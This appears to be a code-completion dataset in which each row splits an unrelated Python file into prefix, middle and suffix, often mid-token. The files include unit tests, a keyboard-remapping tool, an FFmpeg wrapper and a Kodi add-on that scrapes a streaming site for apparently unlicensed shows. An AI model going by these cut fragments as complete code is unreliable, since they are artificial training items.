prefix stringlengths 0 918k | middle stringlengths 0 812k | suffix stringlengths 0 962k |
|---|---|---|
import unittest
from jsonschema import SchemaError
from minibus import MiniBusClient
class SyntaxTest(unittest.TestCase):
def setUp(self):
self.client = MiniBusClient()
def callback(self):
pass
def callback2(self):
pass
def test_sub_good(self):
self.client.subscribe("test_sub_good", {'type': "number"}, self.callback)
def test_sub_bad_schema(self):
self.assertRaises(SchemaError, self.client.subscribe,
"test_sub_bad_schema", {"type": "orange"}, self.callback)
def test_sub_schema_mismatch(self):
self.client.subscribe("test_sub_schema_mismatch", | {"type": "number"}, self.callback)
self.assertRaises(Exception, self.client.subscribe,
"test_sub_schema_mismatch", {"type": "string"}, self.callback2)
def test_sub_schema_dupcallback(self):
self.client.subscribe("test_sub_schema_dupcallback", {"type": "number"}, self.callback)
self.assertRaises(Exception, self.client.subscribe, |
"test_sub_schema_dupcallback", {"type": "number"}, self.callback)
if __name__ == "__main__":
unittest.main()
|
from model.contact import Contact
from random import randrange
def test_edit_contact(app, db, check_ui):
if len(db.get_contact_list()) == 0:
app.contact.create(Contact(first_name ="Sabina", last_name="test", company="Pewex",
address="osiedle", phone_home="123456789", e_mail="sabina@sabina.pl",
year="2016",))
old_contact = db.get_contact_list()
index = randrange(len(old_contact))
contact = Contact(first_name='Ka | sia', last_name='Bober')
contact.id = old_contact[index].id
app.contact.edit_contact_by_index(index, contact)
assert len(old_contact) == app.contact.count()
new_contact = db.get_contact_list()
old_contact[index] = contact
assert old_contact == new_contact
if check_ui:
assert | sorted(new_contact, key=Contact.id_or_max) == sorted(
app.group.get_contact_list(), key=Contact.id_or_max
) |
efAssetHint(MozDefEvent):
def validate(self):
if not MozDefEvent.validate(self):
return False
# A hint event should always have details
if len(self.details.keys()) == 0:
return False
return True
def __init__(self, url):
MozDefEvent.__init__(self, url)
self._msgtype = self.MSGTYPE_ASSETHINT
self._category = 'asset_hint'
class MozDefCompliance(MozDefEvent):
def validate_log(self):
if 'details' not in self._sendlog:
return False
t = self._sendlog['details']
for k in ['target', 'policy', 'check', 'compliance', 'link',
'utctimestamp']:
if k not in t.keys():
return False
for k in ['level', 'name', 'url']:
if k not in t['policy'].keys():
return False
for k in ['description', 'location', 'name', 'test']:
if k not in t['check'].keys():
return False
for k in ['type', 'value']:
if k not in t['check']['test'].keys():
return False
return True
def __init__(self, url):
MozDefEvent.__init__(self, url)
self._msgtype = self.MSGTYPE_COMPLIANCE
self._category = 'complianceitems'
class MozDefTests(unittest.TestCase):
def create_valid_event(self):
self.emsg_summary = 'a test event'
self.emsg_tags = ['generic', 'test']
self.emsg_details = {'one': 1, 'two': 'two'}
def create_valid_vuln(self):
self.vulnmsg = {}
self.vulnmsg['description'] = 'system vulnerability management ' \
'automation'
self.vulnmsg['utctimestamp'] = '2015-01-21T15:33:51.136378+00:00'
self.vulnmsg['sourcename'] = 'development'
self.vulnmsg['asset'] = {}
self.vulnmsg['asset']['assetid'] = 23
self.vulnmsg['asset']['ipv4address'] = '1.2.3.4'
self.vulnmsg['asset']['macaddress'] = ''
self.vulnmsg['asset']['hostname'] = 'git.mozilla.com'
self.vulnmsg['vuln'] = {}
self.vulnmsg['vuln']['status'] = 'new'
self.vulnmsg['vuln']['vulnid'] = 'nexpose:43883'
self.vulnmsg['vuln']['title'] = \
'RHSA-2013:1475: postgresql and postgresql84 security update'
self.vulnmsg['vuln']['discovery_time'] = 1421845863
self.vulnmsg['vuln']['age_days'] = 32.7
self.vulnmsg['vuln']['known_malware'] = False
self.vulnmsg['vuln']['known_exploits'] = False
self.vulnmsg['vuln']['cvss'] = 8.5
self.vulnmsg['vuln']['cves'] = ['CVE-2013-022', 'CVE-2013-1900']
def create_valid_comp(self):
self.compmsg = {}
self.compmsg['target'] = 'www.mozilla.com'
self.compmsg['utctimestamp'] = '2015-03-04T18:25:52.849272+00:00'
| self.compmsg['tags'] = {
'operator': 'it',
'autogroup': 'opsec'
}
self.compmsg['compliance'] = True
self.compmsg['link'] = 'http://a.url'
self.compmsg['policy'] = {
'url': 'http://another.url',
'name': 'system',
'level': 'medium'
}
self.compmsg['check'] | = {
'test': {
'type': 'nexpose',
'name': 'assess',
'value': 'nexpose'
},
'location': 'endpoint',
'ref': 'sysmediumupdates1',
'name': 'vulnerability scanner check',
'description': 'validate system patch level'
}
def setUp(self):
self.create_valid_vuln()
self.create_valid_comp()
self.create_valid_event()
def testFailMessageSend(self):
m = MozDefMessage('http://127.0.0.1')
with self.assertRaises(MozDefError):
m.send()
def testFailEventSend(self):
m = MozDefEvent('http://127.0.0.1:1/nonexistent')
with self.assertRaises(Exception):
m.send()
def testMozdefMessage(self):
m = MozDefMessage('http://127.0.0.1')
self.assertIsNotNone(m)
self.assertIsNotNone(m.hostname)
self.assertEqual(m._url, 'http://127.0.0.1')
m.hostname = 'examplehostname'
self.assertEqual(m.hostname, 'examplehostname')
def testMozdefEvent(self):
m = MozDefEvent('http://127.0.0.1')
self.assertIsNotNone(m)
self.assertEqual(m._msgtype, MozDefMessage.MSGTYPE_EVENT)
self.assertIsNotNone(m.hostname)
self.assertEqual(m._url, 'http://127.0.0.1')
m.hostname = 'examplehostname'
self.assertEqual(m.hostname, 'examplehostname')
def testMozdefEventValidate(self):
m = MozDefEvent('http://127.0.0.1')
self.assertFalse(m.validate())
m.summary = 'test event'
self.assertTrue(m.validate())
def testMozdefEventConstruct(self):
m = MozDefEvent('http://127.0.0.1')
m.summary = 'test event'
m.construct()
self.assertEqual(m._sendlog['category'], 'event')
self.assertEqual(m._sendlog['summary'], 'test event')
def testMozdefEventHostname(self):
m = MozDefEvent('http://127.0.0.1')
m.hostname = 'samplehostname'
self.assertEqual(m.hostname, 'samplehostname')
def testMozdefVulnValidate(self):
m = MozDefVulnerability('http://127.0.0.1')
self.assertTrue(m.validate())
m.construct()
self.assertFalse(m.validate_log())
m.log = self.vulnmsg
m.construct()
self.assertTrue(m.validate_log())
def testMozdefComplianceValidate(self):
m = MozDefCompliance('http://127.0.0.1')
self.assertFalse(m.validate())
m.summary = 'compliance item'
self.assertTrue(m.validate())
m.construct()
self.assertFalse(m.validate_log())
m.details = self.compmsg
m.construct()
self.assertTrue(m.validate_log())
def testMozdefEventSyslog(self):
m = MozDefEvent('http://127.0.0.1')
m.summary = self.emsg_summary
m.tags = self.emsg_tags
m.details = self.emsg_details
m.set_severity(MozDefEvent.SEVERITY_CRITICAL)
m.construct()
s = m.syslog_convert()
self.assertIsNotNone(s)
m.set_send_to_syslog(True, only_syslog=True)
m.send()
def testMozdefCompSyslog(self):
m = MozDefCompliance('http://127.0.0.1')
m.log = self.compmsg
self.assertIsNotNone(m.syslog_convert())
def testAssetHintValidate(self):
m = MozDefAssetHint('http://127.0.0.1')
self.assertFalse(m.validate())
m.summary = 'an asset hint event'
self.assertFalse(m.validate())
m.details = {'hostname': 'test'}
self.assertTrue(m.validate())
def testAssetHint(self):
m = MozDefAssetHint('http://127.0.0.1')
self.assertIsNotNone(m)
def testRRAValidate(self):
m = MozDefRRA('http://127.0.0.1')
self.assertFalse(m.validate())
m.summary = 'an RRA event'
m.category = 'rra_data'
self.assertFalse(m.validate())
m.details = {'metadata': {'service': 'test'}}
self.assertTrue(m.validate())
def testRRA(self):
m = MozDefRRA('http://127.0.0.1')
self.assertIsNotNone(m)
def testSimpleMsg(self):
m = MozDefMsg('http://127.0.0.1', tags=['openvpn', 'duosecurity'])
self.assertIsNotNone(m)
def testSimpleSqs(self):
m = MozDefMsg('http://127.0.0.1', tags=['openvpn', 'duosecurity'])
if not boto_loaded:
raise ImportError("Boto3 is not loaded")
m.sendToSqs = True
m.sqsRegion = 'us-west-1'
m.sqsQueueName = 'test'
m.sqsAWSAccountId = 'test'
m.send('hi')
self.assertIsNotNone(m)
def testSimpleSyslog(self):
m = MozDefMsg('http://127.0.0.1', tags=['openvpn', 'duosecurity'])
m.sendToSyslog = True
m.syslogOnly = True
m.fire_and_forget_mode = True
m.log['somefield'] = 'test'
with self.assertRaises(MozDefError):
m.send()
m.send('hi')
def testSimpleSyslogDetails(self):
m = MozDefMsg('http://127.0.0.1')
|
e=32.*u.MHz, complex_data=False)
data = fr.read(20000) # enough to fill one EDV3 frame.
time1 = fr.tell(unit='time')
# Get a file name in our temporary testing directory.
vdif_file = str(tmpdir.join('converted.vdif'))
# create and fill vdif file with converted data.
with vdif.open(vdif_file, 'ws', header0=header,
nthread=data.shape[1]) as fw:
assert (fw.tell(unit='time') - m5h.time) < 2. * u.ns
fw.write(data)
assert (fw.tell(unit='time') - time1) < 2. * u.ns
# Check two files contain same information.
with mark5b.open(SAMPLE_M5B, 'rs', sample_rate=32.*u.MHz, kday=56000,
nchan=8, bps=2) as fm, vdif.open(vdif_file,
'rs') as fv:
assert fm.header0.time == fv.header0.time
dm = fm.read(20000)
dv = fv.read(20000)
assert np.all(dm == dv)
assert fm.offset == fv.offset
assert fm.tell(unit='time') == fv.tell(unit='time')
# Convert VDIF file back to Mark 5B
mark5b_new_file = str(tmpdir.join('reconverted.mark5b'))
hv = fv.header0
hm = fm.header0
# Here, we fill some unimportant Mark 5B header information by
# hand, so we can compare byte-for-byte.
with mark5b.open(mark5b_new_file, 'ws', sample_rate=hv.sample_rate,
nchan=dv.shape[1], bps=hv.bps,
time=hv.time, user=hm['user'],
internal_tvg=hm['internal_tvg']) as fw:
fw.write(dv)
with open(SAMPLE_M5B, 'rb') as fh_orig, open(mark5b_new_file,
'rb') as fh_new:
assert fh_orig.read() == fh_new.read()
class TestVDIF3ToMark5B:
"""Real conversion: VDIF EDV 3 to Mark5B."""
def test_header(self):
with open(SAMPLE_VDIF, 'rb') as fh:
vh = vdif.VDIFHeader.fromfile(fh)
header = mark5b.Mark5BHeader.fromvalues(time=vh.time)
assert header.time == vh.time
def test_stream(self, tmpdir):
with vdif.open(SAMPLE_VDIF, 'rs') as fr:
vh = fr.header0
data = fr.read(20000) # enough to fill two Mark 5B frames.
fl = str(tmpdir.join('test.m5b'))
with mark5b.open(fl, 'ws', sample_rate=vh.sample_rate,
nchan=data.shape[1], bps=vh.bps, time=vh.time) as fw:
fw.write(data)
with vdif.open(SAMPLE_VDIF, 'rs') as fv, mark5b.open(
fl, 'rs', sample_rate=32.*u.MHz,
ref_time=Time(57000, format='mjd'), nchan=8, bps=2) as fm:
assert fv.header0.time == fm.header0.time
dv = fv.read(20000)
d | m = fm.read(20000)
assert np.all(dm == dv)
assert fm.offset == fv.offset
assert fm.tell(unit='time') == fv.tell(unit='time')
class TestVDIF0BPS1ToMark5B:
"""Real conversion: VD | IF EDV 3, BPS 1 to Mark 5B."""
def test_stream(self, tmpdir):
with vdif.open(SAMPLE_BPS1_VDIF, 'rs', sample_rate=8*u.MHz) as fr:
start_time = fr.start_time
data = fr.read(5000) # Just one Mark 5B frame.
fl = str(tmpdir.join('test.m5b'))
with mark5b.open(fl, 'ws', sample_rate=8.*u.MHz, nchan=data.shape[1],
bps=1, time=start_time) as fw:
fw.write(data)
fw.write(data)
with vdif.open(SAMPLE_BPS1_VDIF, 'rs',
sample_rate=8*u.MHz) as fv, mark5b.open(
fl, 'rs', sample_rate=8.*u.MHz, nchan=16, bps=1,
ref_time=Time('2018-09-01')) as fm:
assert fv.start_time == fm.start_time
dv = fv.read(5000)
dm = fm.read(5000)
assert np.all(dm == dv)
assert fm.offset == fv.offset
assert fm.tell(unit='time') == fv.tell(unit='time')
dm = fm.read(5000)
assert np.all(dm == dv)
class TestMark4ToVDIF1:
"""Real conversion: Mark 4 to VDIF EDV 1, and back to Mark 4.
Here, need to use a VDIF format with a flexible size, since we want
to create invalid frames corresponding to the pieces of data overwritten
by the Mark 4 header.
"""
def test_header(self):
with open(SAMPLE_M4, 'rb') as fh:
fh.seek(0xa88)
m4h = mark4.Mark4Header.fromfile(fh, ntrack=64, decade=2010)
# Check that we have enough information to create VDIF EDV 1 header.
header = vdif.VDIFHeader.fromvalues(
edv=1, bps=m4h.bps, nchan=1, station='Ar', time=m4h.time,
sample_rate=32.*u.MHz, payload_nbytes=640*2//8, complex_data=False)
assert abs(header.time - m4h.time) < 2. * u.ns
def test_stream(self, tmpdir):
with mark4.open(SAMPLE_M4, 'rs', sample_rate=32.*u.MHz,
ntrack=64, decade=2010) as fr:
m4header0 = fr.header0
start_time = fr.start_time
vheader0 = vdif.VDIFHeader.fromvalues(
edv=1, bps=m4header0.bps, nchan=1, station='Ar',
time=start_time, sample_rate=32.*u.MHz,
payload_nbytes=640*2//8, complex_data=False)
assert abs(vheader0.time - start_time) < 2. * u.ns
data = fr.read(80000) # full Mark 4 frame
offset1 = fr.tell()
time1 = fr.tell(unit='time')
number_of_bytes = fr.fh_raw.tell() - 0xa88
with open(SAMPLE_M4, 'rb') as fh:
fh.seek(0xa88)
orig_bytes = fh.read(number_of_bytes)
fl = str(tmpdir.join('test.vdif'))
with vdif.open(fl, 'ws', header0=vheader0,
nthread=data.shape[1]) as fw:
assert (fw.tell(unit='time') - start_time) < 2. * u.ns
# Write first VDIF frame, matching Mark 4 Header, hence invalid.
fw.write(data[:160], valid=False)
# Write remaining VDIF frames, with valid data.
fw.write(data[160:])
assert (fw.tell(unit='time') - time1) < 2. * u.ns
with vdif.open(fl, 'rs') as fv:
assert abs(fv.header0.time - start_time) < 2. * u.ns
expected = vheader0.copy()
expected['invalid_data'] = True
assert fv.header0 == expected
dv = fv.read(80000)
assert np.all(dv == data)
assert fv.offset == offset1
assert abs(fv.tell(unit='time') - time1) < 2.*u.ns
# Convert VDIF file back to Mark 4, and check byte-for-byte.
fl2 = str(tmpdir.join('test.m4'))
with mark4.open(fl2, 'ws', sample_rate=vheader0.sample_rate,
ntrack=64, bps=2, fanout=4, time=vheader0.time,
system_id=108) as fw:
fw.write(dv)
with open(fl2, 'rb') as fh:
conv_bytes = fh.read()
assert len(conv_bytes) == len(conv_bytes)
assert orig_bytes == conv_bytes
class TestDADAToVDIF1:
"""Real conversion: DADA to VDIF EDV 1, and back to DADA.
Here, we use a VDIF format with a flexible size so it is easier to fit
the dada file inside the VDIF one.
"""
def get_vdif_header(self, header):
return vdif.VDIFHeader.fromvalues(
edv=1, time=header.time, sample_rate=header.sample_rate,
bps=header.bps, nchan=header['NCHAN'],
complex_data=header.complex_data,
payload_nbytes=header.payload_nbytes // 2,
station=header['TELESCOPE'][:2])
def get_vdif_data(self, dada_data):
return (dada_data + 0.5 + 0.5j) / EIGHT_BIT_1_SIGMA
def get_dada_data(self, vdif_data):
return vdif_data * EIGHT_BIT_1_SIGMA - 0.5 - 0.5j
def test_header(self):
with open(SAMPLE_DADA, 'rb') as fh:
ddh = dada.DADAHeader.fromfile(fh)
# Check that we have enough information to create VDIF EDV 1 header.
header = self.get_vdif_header(ddh)
assert abs(header.time - ddh.time) < 2. |
#
# acrosby 2013
#
def __call__(nc):
s = {}
fo | r attr in nc.ncattrs():
s[attr | ] = nc.getncattr(attr)
return s
|
# -*- coding: UTF-8 -*-
"""
Name: generic_task.py
Porpose: Execute a generic task with FFmpeg
Compatibility: Python3 (Unix, Windows)
Author: Gianluca Pernigotto <jeanlucperni@gmail.com>
Copyright: (c) 2018/2022 Gianluca Pernigotto <jeanlucperni@gmail.com>
license: GPL3
Rev: Feb.14.2022
Code checker:
flake8: --ignore F821, W504
pylint: --ignore E0602, E1101
This file is part of Videomass.
Videomass is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the | License, or
(at your option) any later version.
Videomass is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warran | ty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Videomass. If not, see <http://www.gnu.org/licenses/>.
"""
from threading import Thread
import platform
import subprocess
import wx
from videomass.vdms_utils.utils import Popen
if not platform.system() == 'Windows':
import shlex
class FFmpegGenericTask(Thread):
"""
Run a generic task with FFmpeg as a separate thread.
This class does not redirect any progress output information
for debugging, however you can get the exit status message
USE:
thread = FFmpegGenericTask(args)
thread.join()
error = thread.status
if error:
print('%s' % error)
return
"""
get = wx.GetApp()
appdata = get.appset
def __init__(self, param):
"""
Attributes defined here:
self.param, a string containing the command parameters
of FFmpeg, excluding the command itself `ffmpeg`
self.status, If the exit status is true (which can be an
exception or error message given by returncode) it must be
handled appropriately, in the other case it is None.
"""
self.param = param
self.status = None
Thread.__init__(self)
self.start()
# ----------------------------------------------------------------#
def run(self):
"""
Get and redirect output errors on p.returncode instance and
OSError exception. Otherwise the getted output is None
"""
cmd = (f'"{FFmpegGenericTask.appdata["ffmpeg_cmd"]}" '
f'{FFmpegGenericTask.appdata["ffmpegloglev"]} '
f'{FFmpegGenericTask.appdata["ffmpeg+params"]} '
f'{self.param}')
if not platform.system() == 'Windows':
cmd = shlex.split(cmd)
try:
with Popen(cmd,
stderr=subprocess.PIPE,
universal_newlines=True,
) as proc:
error = proc.communicate()
if proc.returncode: # ffmpeg error
if error[1]:
self.status = error[1]
else:
self.status = "Unrecognized error"
return
except OSError as err: # command not found
self.status = err
return
|
#!/usr/bin/env python
# coding: utf-8
from .interactiveapp import InteractiveApplication, ENCODING
class InteractiveLoopApplication(InteractiveApplication):
def __init__(self, name, desc, version,
padding, margin, suffix, encoding=ENCODING):
super(InteractiveLoopApplication, self).__init__(
name, desc, version, padding, margin, suffix, encoding)
# loop status
self.STATUS_EXIT = 0
self.STATUS_CONTINUE = 1
def loop(self, func):
def mainloop():
loop_flag = self.STATUS_CONTINUE
while loop_flag == self.STATUS_CONTINUE:
try:
loop_flag = func()
except KeyboardInterrupt | :
self.write_error("Terminated.")
self.exit(0)
self.exit(0) |
return mainloop
|
org/licenses.
# contact: elmamyra@gmail.com
# -*- coding: utf-8 -*-
from Xlib.display import Display
from Xlib import X, error
import Xlib
from collections import namedtuple
from gtk import gdk
import gtk
from subprocess import Popen, PIPE
from threading import Timer
from itertools import groupby
from operator import itemgetter
keyEvent = namedtuple('keyEvent', ['type', 'keycode', 'modMask'])
DEAD_KEYS = (
'grave',
'acute',
'circumflex',
'tilde',
'macron',
'breve',
'abovedot',
'diaeresis',
'ring',
'doubleacute',
'caron',
'cedilla',
'ogonek',
'belowdot',
'hook',
'horn',
'stroke',
'schwa',
'SCHWA',
)
LEVEL_MOD = (0, X.ShiftMask, X.Mod5Mask, X.ShiftMask | X.Mod5Mask, X.ControlMask | X.Mod1Mask)
class KeyTools:
KEY_PRESS = X.KeyPress
KEY_RELEASE = X.KeyRelease
def __init__(self):
self._xdisplay = Display()
self._xroot = self._xdisplay.screen().root
self._clipboard = gtk.clipboard_get()
self._clipPrimay = gtk.clipboard_get("PRIMARY")
self._entryForPaste = 118, X.ShiftMask
self._group = 0
self.loadModifiers()
self._keymap = gdk.keymap_get_default() # @UndefinedVariable
def loadModifiers(self):
self._modifiers = []
self._modifierList = []
for key in self._xdisplay.get_modifier_mapping():
li = [k for k in key if k]
#for altgr key
if 92 in li:
li.append(108)
self._modifierList += li
self._modifiers.append(li)
def filterGroup(self, entries):
if entries:
return [e for e in entries if e[-2] == self._group]
return []
def remapKey(self, keycode, keysyms):
allKeysyms = list(self._xdisplay.get_keyboard_mapping(keycode, 1)[0])
keysyms = keysyms + [0]*(4 - len(keysyms))
allKeysyms[:2] = keysyms[:2]
allKeysyms[4:6] = keysyms[2:]
self._xdisplay.change_keyboard_mapping(keycode, [allKeysyms])
self._xdisplay.sync()
def resetMapping(self):
try:
process = Popen('setxkbmap -print -verbose 7'.split(), stdout=PIPE, stderr=PIPE)
except OSError:
print 'install setxkbmap'
for line in process.stderr:
print 'setxkbmap error: {}'.format(line)
layout = variant = ''
for line in process.stdout:
line = line.rstrip()
if line == '':
break
if line.startswith('layout:'):
layout = line.split()[1]
elif line.startswith('variant:'):
variant = line.split()[1]
break
command = ['setxkbmap']
if layout:
command += ['-layout', layout]
if variant:
command += ['-variant', variant]
if layout or command:
try:
process = Popen(command, stdout=PIPE, stderr=PIPE)
except OSError:
print 'install setxkbmap'
for line in process.stderr:
print 'setxkbmap error: {}'.format(line)
def isModifier(self, keycode):
return keycode in self._modifierList
def getModMask(self, keycode):
for i, mods in enumerate(self._modifiers):
if keycode in mods:
return 2**i
return 0
def modifiersKeycodeList(self):
return self._modifierList
def numMask(self):
return X.Mod2Mask
def keycode2char(self, keycode, mods, group=0):
char = ''
name = ''
info = self._keymap.translate_keyboard_state(keycode, mods, group)
if info:
keysym = info[0]
char = gdk.keyval_to_unicode(keysym) # @UndefinedVariable
if char:
char = unichr(char)
name = gdk.keyval_name(keysym) # @UndefinedVariable
return char or '', name or ''
def removeNumLockMask(self, keycode, mod):
if not self.isKeypadKey(keycode) and mod & X.Mod2Mask:
return mod ^ X.Mod2Mask
return mod
def entry2keysym(self, keycode, modMask):
info = self._keymap.translate_keyboard_state(keycode, modMask, self._group)
if info:
return info[0]
return None
def entry2name(self, keycode, modMask):
keysym = self.entry2keysym(keycode, modMask)
if keysym is not None:
return gdk.keyval_name(keysym) # @UndefinedVariable
return None
def keycode2entries(self, keycode):
return self.filterGroup(self._keymap.get_entries_for_keycode(keycode))
def keysym2entry(self, keysym):
if not keysym:
return None
infos = self._keymap.get_entries_for_keyval(keysym) # @UndefinedVariable
if infos:
for info in infos:
keyc | ode, group, level = info
if group == self._group:
if level < len(LEVEL_MOD):
mod = LEVEL_MOD[level]
return keycode, mod
return None
def keysym2deadEntries(self, keysym):
resp = ()
entry = self.keysym2entry(keysym)
if entry:
keycode, mod = entry
resp = ((keycode, m | od), )
if not resp:
deadKeys = self.findWithDeadKey(keysym)
if deadKeys:
keyKeysym, deadKeysym = deadKeys
keyKeycodes = self.keysym2entry(keyKeysym)
deadKeycodes = self.keysym2entry(deadKeysym)
if keyKeycodes and deadKeycodes:
keyKeycode, keyMod = keyKeycodes
deadKeycode, deadMod = deadKeycodes
resp = ((deadKeycode, deadMod), (keyKeycode, keyMod))
return resp
def keycode2charsAndNames(self, keycode):
entries = self.keycode2entries(keycode)
chars = []
names = []
for entry in entries:
chars.append(keysym2char(entry[0]))
names.append(keysym2name(entry[0]))
if len(chars) >= 4:
break
while not names[-1]:
chars.pop(-1)
names.pop(-1)
return chars, names
def keycode2keysyms(self, keycode):
entries = self.keycode2entries(keycode)
return [e[0] for e in entries][:4]
def char2entries(self, char):
keysym = gdk.unicode_to_keyval(ord(char)) # @UndefinedVariable
if keysym:
return self.keysym2deadEntries(keysym)
return ()
def findWithDeadKey(self, keysym):
name = gdk.keyval_name(keysym) # @UndefinedVariable
for deadName in DEAD_KEYS:
if name.endswith(deadName):
keyName = name[:-len(deadName)]
deadName = {'ring': 'abovering',
'schwa': 'small_schwa',
'SCHWA': 'capital_schwa'}.get(deadName, deadName)
deadName = 'dead_' + deadName
keyKeysym = gdk.keyval_from_name(keyName) # @UndefinedVariable
deadSym = gdk.keyval_from_name(deadName) # @UndefinedVariable
return keyKeysym, deadSym
return None
def isKeypadKey(self, keycode):
entry = self._keymap.get_entries_for_keycode(keycode)
if entry:
for info in entry:
if info[2] == self._group:
name = gdk.keyval_name(info[0]) # @UndefinedVariable
if name and name.startswith('KP_'):
return True
return False
def grabKey(self, keycode, modMask):
self._xroot.grab_key(keycode, modMask, 0, X.GrabModeAsync, X.GrabModeAsync)
if not self.isKeypadKey(keycode) and not modM |
from cx_Freeze import setup, Exe | cutable
# Dependencies are automatically detected, but it might need
# fine tuning.
buildOptions = dict(packages = ["pyglet", "polytanks", "codecs", "encodings", "selectors"],
excludes = ["tkinter", "PyQt5", "PIL", "setuptools"]
, include_files="assets")
import sys
base = 'Win32GUI' if sys.platform=='win32' else None
executables = [
Executable('main.py', base=base, targetName = 'cliente.exe')
]
setup(name='polytanks-cliente',
version = '1.0',
description = 'Cliente d | e Polytanks',
options = dict(build_exe = buildOptions),
executables = executables)
|
otalLinks)+'[/B].'
dialogWait.update(percent,'[B]Will load instantly from now on[/B]',remaining_display)
if (dialogWait.iscanceled()):
return False
dialogWait.close()
del dialogWait
main.CloseAllDialogs()
main.GA("HD","Oneclickwatch")
def LISTTV3(murl):
#urllist=main.OPENURL('http://oneclickwatch.org/category/tv-shows/')+main.OPENURL('http://oneclickwatch.org/category/tv-shows/page/2/')+main.OPENURL('http://oneclickwatch.org/category/tv-shows/page/3/')+main.OPENURL('http://oneclickwatch.org/category/tv-shows/page/4/')+main.OPENURL('http://oneclickwatch.org/category/tv-shows/page/5/')
urllist=main.batchOPENURL(('http://oneclickwatch.org/category/tv-shows/','http://oneclickwatch.org/category/tv-shows/page/2/','http://oneclickwatch.org/category/tv-shows/page/3/','http://oneclickwatch.org/category/tv-shows/page/4/','http://oneclickwatch.org/category/tv-shows/page/5/'))
if urllist:
urllist=main.unescapes(urllist)
match=re.compile('title=".+?">([^<]+)</a></h2>.+?href=".+?<a href="(.+?)" .+?href=".+?>.+?src="(.+?)"').findall(urllist)
dialogWait = xbmcgui.DialogProgress()
ret = dialogWait.create('Please wait until Show list is cached.')
totalLinks = len(match)
loadedLinks = 0
remaining_display = 'Episodes loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
dialogWait.update(0,'[B]Will load instantly from now on[/B]',remaining_display)
for name,url,thumb in match:
name=name.replace('\xc2\xa0','').replace('" ','').replace(' "','').replace('"','').replace("'","'").replace("&","and").replace("’","'").replace("amp;","and").replace("#8211;","-")
main.addPlayTE(name,url,134,thumb,'','','','','')
loadedLinks = loadedLinks + 1
percent = (loadedLinks * 100)/totalLinks
remaining_display = 'Episodes loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
dialogWait.update(percent,'[B]Will load instantly from now on[/B]',remaining_display)
if (dialogWait.iscanceled()):
return False
dialogWait.close()
del dialogWait
main.GA("TV","Oneclickwatch")
def PLAYOCW(mname,murl):
sources=[]
main.GA("OneclickwatchT","Watched")
ok=True
playlist = xbmc.PlayList(xbmc.PLAYLIST_VIDEO)
playlist.clear()
xbmc.executebuiltin("XBMC.Notification(Please Wait!,Collecting Hosts,5000)")
link=main.OPENURL(murl)
link=link.replace('\r','').replace('\n','').replace('\t','').replace(' ','')
match=re.compile('<p><a href=".+?" rel=".+?">(.+?)</a></p>').findall(link)
desc=re.compile('<.+? />Plot:(.+?)<.+? />').findall(link)
if len(desc)>0:
descs=desc[0]
else:
descs=''
thumb=re.compile('<img alt="" src="(.+?)"').findall(link)
if len(thumb)>0: |
thumbs=thumb[0]
else:
thumbs=''
main.CloseAllDialogs()
import urlresolver
for url in match:
host=re.compile("http://(.+?).com/.+?").findall(url)
for hname in host:
host=hname.replace('www.','')
hosted_media = urlresolver.HostedMediaFile(url=url, titl | e=host)
sources.append(hosted_media)
if (len(sources)==0):
xbmc.executebuiltin("XBMC.Notification(Sorry!,Show doesn't have playable links,5000)")
else:
source = urlresolver.choose_source(sources)
try:
if source:
xbmc.executebuiltin("XBMC.Notification(Please Wait!,Resolving Link,3000)")
stream_url = main.resolve_url(source.get_url())
else:
stream_url = False
return
infoLabels =main.GETMETAEpiT(mname,thumbs,descs)
video_type='episode'
season=infoLabels['season']
episode=infoLabels['episode']
img=infoLabels['cover_url']
fanart =infoLabels['backdrop_url']
imdb_id=infoLabels['imdb_id']
infolabels = { 'supports_meta' : 'true', 'video_type':video_type, 'name':str(infoLabels['title']), 'imdb_id':str(infoLabels['imdb_id']), 'season':str(season), 'episode':str(episode), 'year':str(infoLabels['year']) }
infoL={'Title': infoLabels['title'], 'Plot': infoLabels['plot'], 'Genre': infoLabels['genre']}
# play with bookmark
player = playbackengine.PlayWithoutQueueSupport(resolved_url=stream_url, addon_id=addon_id, video_type=video_type, title=str(infoLabels['title']),season=str(season), episode=str(episode), year=str(infoLabels['year']),img=img,infolabels=infoL, watchedCallbackwithParams=main.WatchedCallbackwithParams,imdb_id=imdb_id)
#WatchHistory
if selfAddon.getSetting("whistory") == "true":
wh.add_item(mname+' '+'[COLOR green]Oneclickwatch[/COLOR]', sys.argv[0]+sys.argv[2], infolabels=infolabels, img=img, fanart=fanart, is_folder=False)
player.KeepAlive()
return ok
except:
return ok
def VIDEOLINKST3(mname,murl):
sources=[]
main.GA("OneclickwatchM","Watched")
ok=True
playlist = xbmc.PlayList(xbmc.PLAYLIST_VIDEO)
playlist.clear()
xbmc.executebuiltin("XBMC.Notification(Please Wait!,Collecting Hosts,5000)")
link=main.OPENURL(murl)
link=link.replace('\r','').replace('\n','').replace('\t','').replace(' ','')
match=re.compile('<p><a href="([^"]+?)".*?>().+?</a></p>').findall(link)
if len(match)==0:
match=re.compile('<a href="(.+?)">(.+?)</a><br />').findall(link)
desc=re.compile('<.+? />Plot:(.+?)<.+? />').findall(link)
if len(desc)>0:
descs=desc[0]
else:
descs=''
thumb=re.compile('<img alt="" src="(.+?)"').findall(link)
if len(thumb)>0:
thumbs=thumb[0]
else:
thumbs=''
main.CloseAllDialogs()
import urlresolver
for url,host in match:
print url
hosted_media = urlresolver.HostedMediaFile(url=url, title=host)
sources.append(hosted_media)
if (len(sources)==0):
xbmc.executebuiltin("XBMC.Notification(Sorry!,Show doesn't have playable links,5000)")
else:
source = urlresolver.choose_source(sources)
try:
if source:
xbmc.executebuiltin("XBMC.Notification(Please Wait!,Resolving Link,3000)")
stream_url = main.resolve_url(source.get_url())
else:
stream_url = False
return
print stream_url
infoLabels =main.GETMETAT(mname,'','',thumbs)
video_type='movie'
season=''
episode=''
img=infoLabels['cover_url']
fanart =infoLabels['backdrop_url']
imdb_id=infoLabels['imdb_id']
infolabels = { 'supports_meta' : 'true', 'video_type':video_type, 'name':str(infoLabels['title']), 'imdb_id':str(infoLabels['imdb_id']), 'season':str(season), 'episode':str(episode), 'year':str(infoLabels['year']) }
